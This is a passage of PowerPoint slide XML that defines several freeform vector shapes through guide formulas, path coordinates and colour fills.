                <a:gd name="T18" fmla="*/ 0 60000 65536"/>
                <a:gd name="T19" fmla="*/ 0 60000 65536"/>
                <a:gd name="T20" fmla="*/ 0 60000 65536"/>
                <a:gd name="T21" fmla="*/ 0 w 75"/>
                <a:gd name="T22" fmla="*/ 0 h 98"/>
                <a:gd name="T23" fmla="*/ 75 w 75"/>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98">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="98"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="6"/>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894" name="Freeform 1036">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB734ECF-BF96-4AB8-AE80-BA09EE503331}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3545" y="2522"/>
              <a:ext cx="21" cy="24"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 1 h 48"/>
                <a:gd name="T2" fmla="*/ 1 w 42"/>
                <a:gd name="T3" fmla="*/ 1 h 48"/>
                <a:gd name="T4" fmla="*/ 1 w 42"/>
                <a:gd name="T5" fmla="*/ 1 h 48"/>
                <a:gd name="T6" fmla="*/ 1 w 42"/>
                <a:gd name="T7" fmla="*/ 1 h 48"/>
                <a:gd name="T8" fmla="*/ 1 w 42"/>
                <a:gd name="T9" fmla="*/ 1 h 48"/>
                <a:gd name="T10" fmla="*/ 1 w 42"/>
                <a:gd name="T11" fmla="*/ 1 h 48"/>
                <a:gd name="T12" fmla="*/ 1 w 42"/>
                <a:gd name="T13" fmla="*/ 0 h 48"/>
                <a:gd name="T14" fmla="*/ 1 w 42"/>
                <a:gd name="T15" fmla="*/ 1 h 48"/>
                <a:gd name="T16" fmla="*/ 1 w 42"/>
                <a:gd name="T17" fmla="*/ 1 h 48"/>
                <a:gd name="T18" fmla="*/ 1 w 42"/>
                <a:gd name="T19" fmla="*/ 1 h 48"/>
                <a:gd name="T20" fmla="*/ 1 w 42"/>
                <a:gd name="T21" fmla="*/ 1 h 48"/>
                <a:gd name="T22" fmla="*/ 1 w 42"/>
                <a:gd name="T23" fmla="*/ 1 h 48"/>
                <a:gd name="T24" fmla="*/ 1 w 42"/>
                <a:gd name="T25" fmla="*/ 1 h 48"/>
                <a:gd name="T26" fmla="*/ 1 w 42"/>
                <a:gd name="T27" fmla="*/ 1 h 48"/>
                <a:gd name="T28" fmla="*/ 1 w 42"/>
                <a:gd name="T29" fmla="*/ 1 h 48"/>
                <a:gd name="T30" fmla="*/ 0 w 42"/>
                <a:gd name="T31" fmla="*/ 1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48"/>
                <a:gd name="T50" fmla="*/ 42 w 42"/>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48">
                  <a:moveTo>
                    <a:pt x="0" y="26"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19" y="43"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="41"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="41"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="41"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="26"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122895" name="Freeform 1037">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669699D4-10C3-46A8-B694-C322376842FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3533" y="2497"/>
              <a:ext cx="11" cy="15"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 21"/>
                <a:gd name="T1" fmla="*/ 0 h 29"/>
                <a:gd name="T2" fmla="*/ 1 w 21"/>
                <a:gd name="T3" fmla="*/ 1 h 29"/>
                <a:gd name="T4" fmla="*/ 1 w 21"/>
                <a:gd name="T5" fmla="*/ 1 h 29"/>
                <a:gd name="T6" fmla="*/ 1 w 21"/>
                <a:gd name="T7" fmla="*/ 1 h 29"/>
                <a:gd name="T8" fmla="*/ 0 w 21"/>
                <a:gd name="T9" fmla="*/ 0 h 29"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 21"/>
                <a:gd name="T16" fmla="*/ 0 h 29"/>
                <a:gd name="T17" fmla="*/ 21 w 21"/>
                <a:gd name="T18" fmla="*/ 29 h 29"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="21" h="29">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="7"/>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896" name="Freeform 1038">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB54DCE5-422B-4F41-B2D8-F06BD4DF49D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3509" y="2473"/>
              <a:ext cx="29" cy="56"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 59"/>
                <a:gd name="T1" fmla="*/ 0 h 112"/>
                <a:gd name="T2" fmla="*/ 0 w 59"/>
                <a:gd name="T3" fmla="*/ 1 h 112"/>
                <a:gd name="T4" fmla="*/ 0 w 59"/>
                <a:gd name="T5" fmla="*/ 1 h 112"/>
                <a:gd name="T6" fmla="*/ 0 w 59"/>
                <a:gd name="T7" fmla="*/ 1 h 112"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 60000 65536"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 w 59"/>
                <a:gd name="T13" fmla="*/ 0 h 112"/>
                <a:gd name="T14" fmla="*/ 59 w 59"/>
                <a:gd name="T15" fmla="*/ 112 h 112"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T8">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T9">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T10">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T12" t="T13" r="T14" b="T15"/>
              <a:pathLst>
                <a:path w="59" h="112">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="112"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="11113">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897" name="Freeform 1039">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92458A5E-2F1F-4AA7-A918-A53565C8B5E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3493" y="2445"/>
              <a:ext cx="99" cy="118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 197"/>
                <a:gd name="T1" fmla="*/ 1 h 235"/>
                <a:gd name="T2" fmla="*/ 1 w 197"/>
                <a:gd name="T3" fmla="*/ 1 h 235"/>
                <a:gd name="T4" fmla="*/ 1 w 197"/>
                <a:gd name="T5" fmla="*/ 1 h 235"/>
                <a:gd name="T6" fmla="*/ 1 w 197"/>
                <a:gd name="T7" fmla="*/ 1 h 235"/>
                <a:gd name="T8" fmla="*/ 0 w 197"/>
                <a:gd name="T9" fmla="*/ 1 h 235"/>
                <a:gd name="T10" fmla="*/ 0 w 197"/>
                <a:gd name="T11" fmla="*/ 1 h 235"/>
                <a:gd name="T12" fmla="*/ 1 w 197"/>
                <a:gd name="T13" fmla="*/ 0 h 235"/>
                <a:gd name="T14" fmla="*/ 1 w 197"/>
                <a:gd name="T15" fmla="*/ 1 h 235"/>
                <a:gd name="T16" fmla="*/ 1 w 197"/>
                <a:gd name="T17" fmla="*/ 1 h 235"/>
                <a:gd name="T18" fmla="*/ 1 w 197"/>
                <a:gd name="T19" fmla="*/ 1 h 235"/>
                <a:gd name="T20" fmla="*/ 1 w 197"/>
                <a:gd name="T21" fmla="*/ 1 h 235"/>
                <a:gd name="T22" fmla="*/ 1 w 197"/>
                <a:gd name="T23" fmla="*/ 1 h 2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235"/>
                <a:gd name="T38" fmla="*/ 197 w 197"/>
                <a:gd name="T39" fmla="*/ 235 h 2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235">
                  <a:moveTo>
                    <a:pt x="156" y="235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="109" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="235"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E10000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="E10000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122898" name="Freeform 1040">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D2E19F-0446-43B1-9C48-BE76A779D42B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3515" y="2213"/>
              <a:ext cx="294" cy="328"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 588"/>
                <a:gd name="T1" fmla="*/ 1 h 656"/>
                <a:gd name="T2" fmla="*/ 1 w 588"/>
                <a:gd name="T3" fmla="*/ 1 h 656"/>
                <a:gd name="T4" fmla="*/ 1 w 588"/>
                <a:gd name="T5" fmla="*/ 1 h 656"/>
                <a:gd name="T6" fmla="*/ 1 w 588"/>
                <a:gd name="T7" fmla="*/ 1 h 656"/>
                <a:gd name="T8" fmla="*/ 1 w 588"/>
                <a:gd name="T9" fmla="*/ 1 h 656"/>
                <a:gd name="T10" fmla="*/ 1 w 588"/>
                <a:gd name="T11" fmla="*/ 1 h 656"/>
                <a:gd name="T12" fmla="*/ 1 w 588"/>
                <a:gd name="T13" fmla="*/ 1 h 656"/>
                <a:gd name="T14" fmla="*/ 1 w 588"/>
                <a:gd name="T15" fmla="*/ 1 h 656"/>
                <a:gd name="T16" fmla="*/ 1 w 588"/>
                <a:gd name="T17" fmla="*/ 1 h 656"/>
                <a:gd name="T18" fmla="*/ 1 w 588"/>
                <a:gd name="T19" fmla="*/ 1 h 656"/>
                <a:gd name="T20" fmla="*/ 1 w 588"/>
                <a:gd name="T21" fmla="*/ 1 h 656"/>
                <a:gd name="T22" fmla="*/ 1 w 588"/>
                <a:gd name="T23" fmla="*/ 1 h 656"/>
                <a:gd name="T24" fmla="*/ 1 w 588"/>
                <a:gd name="T25" fmla="*/ 0 h 656"/>
                <a:gd name="T26" fmla="*/ 1 w 588"/>
                <a:gd name="T27" fmla="*/ 1 h 656"/>
                <a:gd name="T28" fmla="*/ 1 w 588"/>
                <a:gd name="T29" fmla="*/ 1 h 656"/>
                <a:gd name="T30" fmla="*/ 1 w 588"/>
                <a:gd name="T31" fmla="*/ 1 h 656"/>
                <a:gd name="T32" fmla="*/ 1 w 588"/>
                <a:gd name="T33" fmla="*/ 1 h 656"/>
                <a:gd name="T34" fmla="*/ 1 w 588"/>
                <a:gd name="T35" fmla="*/ 1 h 656"/>
                <a:gd name="T36" fmla="*/ 1 w 588"/>
                <a:gd name="T37" fmla="*/ 1 h 656"/>
                <a:gd name="T38" fmla="*/ 1 w 588"/>
                <a:gd name="T39" fmla="*/ 1 h 656"/>
                <a:gd name="T40" fmla="*/ 0 w 588"/>
                <a:gd name="T41" fmla="*/ 1 h 656"/>
                <a:gd name="T42" fmla="*/ 1 w 588"/>
                <a:gd name="T43" fmla="*/ 1 h 656"/>
                <a:gd name="T44" fmla="*/ 1 w 588"/>
                <a:gd name="T45" fmla="*/ 1 h 656"/>
                <a:gd name="T46" fmla="*/ 1 w 588"/>
                <a:gd name="T47" fmla="*/ 1 h 656"/>
                <a:gd name="T48" fmla="*/ 1 w 588"/>
                <a:gd name="T49" fmla="*/ 1 h 6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8"/>
                <a:gd name="T76" fmla="*/ 0 h 656"/>
                <a:gd name="T77" fmla="*/ 588 w 588"/>
                <a:gd name="T78" fmla="*/ 656 h 6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8" h="656">
                  <a:moveTo>
                    <a:pt x="152" y="656"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="193" y="581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="656"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="A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899" name="Freeform 1041">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D5A2869-1C4A-4974-AE45-D1573E91DBF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3581" y="2254"/>
              <a:ext cx="187" cy="200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 374"/>
                <a:gd name="T1" fmla="*/ 1 h 400"/>
                <a:gd name="T2" fmla="*/ 1 w 374"/>
                <a:gd name="T3" fmla="*/ 1 h 400"/>
                <a:gd name="T4" fmla="*/ 1 w 374"/>
                <a:gd name="T5" fmla="*/ 1 h 400"/>
                <a:gd name="T6" fmla="*/ 0 w 374"/>
                <a:gd name="T7" fmla="*/ 1 h 400"/>
                <a:gd name="T8" fmla="*/ 1 w 374"/>
                <a:gd name="T9" fmla="*/ 0 h 400"/>
                <a:gd name="T10" fmla="*/ 1 w 374"/>
                <a:gd name="T11" fmla="*/ 1 h 400"/>
                <a:gd name="T12" fmla="*/ 1 w 374"/>
                <a:gd name="T13" fmla="*/ 1 h 400"/>
                <a:gd name="T14" fmla="*/ 1 w 374"/>
                <a:gd name="T15" fmla="*/ 1 h 400"/>
                <a:gd name="T16" fmla="*/ 1 w 374"/>
                <a:gd name="T17" fmla="*/ 1 h 400"/>
                <a:gd name="T18" fmla="*/ 1 w 374"/>
                <a:gd name="T19" fmla="*/ 1 h 400"/>
                <a:gd name="T20" fmla="*/ 1 w 374"/>
                <a:gd name="T21" fmla="*/ 1 h 400"/>
                <a:gd name="T22" fmla="*/ 1 w 374"/>
                <a:gd name="T23" fmla="*/ 1 h 400"/>
                <a:gd name="T24" fmla="*/ 1 w 374"/>
                <a:gd name="T25" fmla="*/ 1 h 4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4"/>
                <a:gd name="T40" fmla="*/ 0 h 400"/>
                <a:gd name="T41" fmla="*/ 374 w 374"/>
                <a:gd name="T42" fmla="*/ 400 h 4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4" h="400">
                  <a:moveTo>
                    <a:pt x="342" y="42"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117" y="287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342" y="4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00" name="Freeform 1042">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C01394-2DD2-411A-B281-9C065FF7E425}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3584" y="2466"/>
              <a:ext cx="21" cy="53"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 43"/>
                <a:gd name="T1" fmla="*/ 1 h 106"/>
                <a:gd name="T2" fmla="*/ 0 w 43"/>
                <a:gd name="T3" fmla="*/ 1 h 106"/>
                <a:gd name="T4" fmla="*/ 0 w 43"/>
                <a:gd name="T5" fmla="*/ 1 h 106"/>
                <a:gd name="T6" fmla="*/ 0 w 43"/>
                <a:gd name="T7" fmla="*/ 1 h 106"/>
                <a:gd name="T8" fmla="*/ 0 w 43"/>
                <a:gd name="T9" fmla="*/ 0 h 106"/>
                <a:gd name="T10" fmla="*/ 0 w 43"/>
                <a:gd name="T11" fmla="*/ 1 h 106"/>
                <a:gd name="T12" fmla="*/ 0 w 43"/>
                <a:gd name="T13" fmla="*/ 1 h 106"/>
                <a:gd name="T14" fmla="*/ 0 w 43"/>
                <a:gd name="T15" fmla="*/ 1 h 106"/>
                <a:gd name="T16" fmla="*/ 0 w 43"/>
                <a:gd name="T17" fmla="*/ 1 h 106"/>
                <a:gd name="T18" fmla="*/ 0 w 43"/>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106"/>
                <a:gd name="T32" fmla="*/ 43 w 43"/>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106">
                  <a:moveTo>
                    <a:pt x="0" y="79"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="79"/>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01" name="Freeform 1043">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD149BA-0527-4C48-B92E-E324369D4266}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3616" y="2371"/>
              <a:ext cx="17" cy="25"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 32"/>
                <a:gd name="T1" fmla="*/ 0 h 51"/>
                <a:gd name="T2" fmla="*/ 0 w 32"/>
                <a:gd name="T3" fmla="*/ 0 h 51"/>
                <a:gd name="T4" fmla="*/ 1 w 32"/>
                <a:gd name="T5" fmla="*/ 0 h 51"/>
                <a:gd name="T6" fmla="*/ 1 w 32"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 1 w 32"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 32"/>
                <a:gd name="T16" fmla="*/ 0 h 51"/>
                <a:gd name="T17" fmla="*/ 32 w 32"/>
                <a:gd name="T18" fmla="*/ 51 h 51"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="32" h="51">
                  <a:moveTo>
                    <a:pt x="30" y="51"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="51"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C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02" name="Freeform 1044">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8199B9A-2F20-4BFD-9977-BE536D9A5E7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3617" y="2334"/>
              <a:ext cx="48" cy="53"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 96"/>
                <a:gd name="T1" fmla="*/ 1 h 105"/>
                <a:gd name="T2" fmla="*/ 1 w 96"/>
                <a:gd name="T3" fmla="*/ 0 h 105"/>
                <a:gd name="T4" fmla="*/ 1 w 96"/>
                <a:gd name="T5" fmla="*/ 1 h 105"/>
                <a:gd name="T6" fmla="*/ 1 w 96"/>
                <a:gd name="T7" fmla="*/ 1 h 105"/>
                <a:gd name="T8" fmla="*/ 0 w 96"/>
                <a:gd name="T9" fmla="*/ 1 h 105"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
